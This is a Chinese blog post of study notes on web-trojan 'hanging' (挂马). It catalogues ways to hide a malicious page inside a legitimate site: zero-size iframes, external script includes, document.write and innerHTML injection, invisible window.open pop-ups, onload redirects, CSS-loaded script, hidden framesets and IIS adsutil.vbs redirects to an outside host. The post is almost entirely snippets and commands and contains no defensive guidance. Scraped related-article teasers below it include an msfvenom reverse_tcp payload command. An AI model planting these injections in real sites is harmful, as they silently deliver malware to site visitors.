网页木马攻防实战学习笔记一

最新推荐文章于 2022-07-29 23:15:55 发布
最新推荐文章于 2022-07-29 23:15:55 发布
阅读量575 收藏 2
点赞数
文章标签: 网页木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlsj228/article/details/97528359
版权

把网页木马嵌入到正常网页中的行为就称“挂马”。

网页木马的隐藏技术

  • 插入隐藏框架:<iframe src = http://网页木马地址 width=0 height=0></iframe>
  • 利用javascript:<script src = "http://xx.js" type = text/javascript>

       利用JS引入木马的方式很多:

1 在js中直接写出框架网页木马,示例代码如下:

document.write("<iframe width=’0’ height=’0’src='网页木马地址'></iframe>");

2 指定language的属性为"JScript.Encode",示例代码如下:

<SCRIPT language="JScript.Encode"src=http://www.xxx.com/mm.jpg></script>;

3 利用js更改body的innerHTML属性,示例代码如下:

top.document.body.innerHTML=top.document.body.innerHTML+'rin<iframe src="http://网页木马地址/%22%3E%3C/iframe%3E

4 利用JavaScript的window.open方法打开一个不可见的新窗口,示例代码如下:
<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no.location=no,
directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>

5 利用URL欺骗,示例代码如下:

<a href="http://www.163.com”onMouseOver="www_163_com();return true;">页面要显示的正常内容</a>:
<SCRIPT Language="JavaScript">
function www_163_com()
{var url="网页木马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,
scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}
</SCRIPT>
  • 利用body的onload属性引入网页木马:

<body οnlοad="window.location='网页木马地址’;"></body>

  • 利用层叠样式表CSS引入js,从而引入网页木马,示例代码如下:

body(background- image:url(javascript:document.write("<script src=http://www.XXX.com/xx.js</script>")’)}

  • 利用隐藏的分割框架引入网页木马,示例代码如下:
<frameset rows=”444,0” cols=”*”>
<frame src = “正常网页” framborder=”no” scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="网页木马" frameborder="no"scrolling="no"noresize marginwidth="0"margingheight="0">
</frameset>
  • 利用ISAPI引入网页木马
  • 利用IIS的资源重定向引入网页木马:
1 用如下命令建立虚拟目录:
script adsutil,vbs Create W3SVC/1/Root/include"IIiaWebVirtualDir”
于是就建立了一个IIS里不可见的虚拟目录,因为没有设置路径,所以不会在IIS管理器中显示。

2 在这个目录下建立一个名字叫做xx.js的虚拟目录:
script adsutil.vbs Create W3svc/1/Root/include/xx.js"IisWebVirtualDir”
这样,就存在一个include/xx.js的虚拟目录了。

3 利用脚本对这个目录进行资源重定向
cscript adsutil.vbs set W3SVC/1/Root/www/include/mm2.js/httpredirect"http://xx.com/yy.js"
这样就更改了xx.js虚拟目录的重定向特性。
  • 利用数据库引入网页木马
  • 利用统计网站大规模挂马
  • 利用ARP欺骗引入网页木马
凌木LSJ
关注
黑客攻防实战学习笔记
边城浪子的博客
11-14 428
1.系统自带“TCP/IP筛选"功能对服务器端口的限制 网上邻居-本地连接-属性-启用TCP/IP筛选(输入端口号只允许此端口连接) 2.服务:开启计算机后,系统会默认启动很多服务项,且每项服务都有一个具体的文件存在,一般存储在C:\windows\system32文件下,其扩展名一般为.exe.dll.sys.等,另外,还可以根据自己的需要开启操作系统中相应的服务和关闭不必要的服务。开启服务...
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8011
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
网页木马攻防实战.rar
11-29
介绍网页木马发展的历史、网页木马剖析、调试器与脚本语言、缓冲区溢出的概念、shellcode的编写、网马免杀方法、网马实例编写与分析、网页木马的防范等内容。
教你学木马攻防 | 隧道木马 | 第一课
七夜的博客
02-03 522
教你学木马攻防 | 隧道木马 | 第一课 前言 今天开始讲讲木马攻防,感觉这些内容大家应该会更感兴趣一些,就从隧道木马说起。为什么会有隧道木马这一说呢?这是根据通信协议进行分类的。讲隧道木马之前,先讲讲端口映射和转发。端口映射和端口转发其实是一回事,原理是一样的,由于应用场景不同,才产生了不同的含义。   场景1 端口映射 端口映射的使用,以下图为...
电子书:《网页木马攻防实战
hanfox的专栏
06-11 934
网页木马攻防实战》从防御网页木马的角度,深入浅出地分析了网页木马的基本原理及相关核心技术,图文并茂地再现了多种网页木马制作及防御的全过程。在内容上将针对性、实践性与综合性加以有机的结合,并包含大量有价值代码,以满足广大读者学习代码分析技术的需求。 《网页木马攻防实战》共分为8章,对网页木马进行了全面透彻的解析。内容包括网页木马综述、网页木马剖析、调试器与脚本语言、缓冲区溢出、Shellco
网页木马攻防实战学习笔记二:缓冲区溢出
xlsj雪松的博客
08-23 439
1 常见案例 1.1 栈溢出 栈是一个在进程映象内存的高地址内的后进先出(LIFO) 的缓冲区。 #include<stdio.h> #include <string.h> char evil[] =”AAAAAAAAAAAAAAAAAAAAAAAA" ; void main() { char buff[4]; strcpy (buff,evil); ...
网站攻防
Greedy Hat的博客
07-17 954
网站攻防
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWA、Pikachu)
ISNS的博客
04-21 1552
最近和同学聊天: 是我太菜。
web安全攻防渗透测试实战指南
weixin_67846882的博客
04-07 4993
1.Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
如何组织一场安全、可靠、高效的网络实战攻防演习?
jifu_edu的博客
06-30 2033
为什么需要实战化能力?当前网络空间面临的安全问题与过去不同,从原来只攻击传统的网络设施和应用系统,到开始面向“云大物移工”等新技术领域的应用系统,攻击的目标系统逐步转向核心业务数据和承载核心数据的业务应用;从普通的个人网络犯罪,到有组织的攻击甚至有境外背景的国家级对抗,攻击工具的武器化、攻击手段的战术化,均对防守者提出了更高要求。图片来源于公共图片库在2017年6月颁布的网络安全法中,明确提出“应定期组织关键信息基础设施的运营者进行网络安全应急演练,提高关键信息基础设施应对网络安全事件的水平和协同配合能力”
Web应用的安全攻防网页木马(SPY)
08-23
Web应用的安全攻防网页木马(SPY)Web应用的安全攻防网页木马(SPY)
4.2 木马攻防实验
qq_55202378的博客
07-27 1484
木马攻防
Webmail邮件攻防实战技术总结[转]
weixin_33777877的博客
05-23 644
WebMail是指利用浏览器通过web方式来收发电子邮件的服务或技术,不需借助邮件客户端,可以说只要能上网就能使用WebMail,极大地方便了用户对邮件的收发。对于不能熟练使用邮件客户端, 或者在网吧不便使用邮件客户端的用户来说,WebMail更是必不可少的选择。Email能够成为当今Internet上应用最广泛的网络服务,WebMail可谓功不可没。  由于用户的使用不当或者WebMail系统...
【网络攻防】常见的网络攻防技术——黑客攻防(通俗易懂版)
m0_67393827的博客
07-29 3157
在世界人口近80亿的地球上,每天尚且发生数以百万计的抢劫打架斗殴事件,网络更是如此,网络攻防战几乎每时每刻都在发生。如果说打架斗殴枪击事件离我们还很远,那网络攻防战在你打开手机的时候就开始了!博主能力有限,暂不谈网络攻防具体操作实现过程,我们用通俗易懂的语言一块聊聊——神秘的“网络攻防”每当听到“网络攻防”这个名词,有没有一瞬间觉得很神秘?脑海中是否下意识的出现身穿黑色连衣帽的黑客中黑入某机构网站的场景?其实它并没有想象中的那么神秘,接下来我们一块唠唠常见的几种常见的网络攻防技术https。...
网页挂马之实战详解
weixin_33709219的博客
03-24 391
  不论是那一种帮凶,***都希望能在被黑者不怀疑、杀毒软件抓不到的情况下,顺利将***保存到被黑电脑中然后运行,经过多年的演变与发展,目前有经验的***最常使用的方法就是利用***网页…也就是说***会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是***网页),当被黑者浏览这个网页,就会利用该漏洞无声无息的趁机将***下载到被黑...
网页木马使用
超哥的专栏
04-22 3182
准备好木马程序 server.exe 将木马程序拷贝到web服务目录下 使用网马生成工具生成web服务 生成后 将web服务拷贝到web服务目录下 配置一下IE 连接测试 ...
网络安全之特洛伊木马攻防战略(转)
csdn785029689的博客
03-06 1287
说起网络安全,我想确实是一个难题,因为网络的确不安全,那麽到底怎麽不安全呢?这也是一两句话难以说清楚,现在我只谈一谈简单的木马攻防战术.木马程序用“瞒天过海”或“披着羊皮的狼”之类的词来形容这类程序一点也不为过,直截了当的说法是...
应急响应实战木马实战
qq_52074678的博客
05-09 2104
一.应急响应流程回顾 二.木马攻击模拟实验 (特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.) 1.环境介绍 攻击机 kali: 下载地址 被攻击机(注意关闭防火墙) win10: 下载地址: 木马脚本源码 msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
网络攻防实验之木马攻击实验
热门推荐
hxxjxw的博客
07-09 1万+
这个实验是网络攻防课程实验中的一个,以冰河木马为例,操作系统是XP,对于现在的安全意义不大了,但是可以看一下多年前流行的冰河木马的功能和操作。 一、实验目的和要求 (1)通过对木马的练习,使读者理解和掌握木马传播和运行的机制; (2)通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。 二、实验原理和实验环境 实验...
SubSeven服务端配置详解:木马攻防与防护策略
SubSeven服务端配置说明主要关注的是网络安全领域中的木马攻防技术,特别是针对恶意软件SubSeven进行配置和防护。以下是对配置选项的详细解析: 1. **启动方法 (Startup method)**: 通过在Windows注册表中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值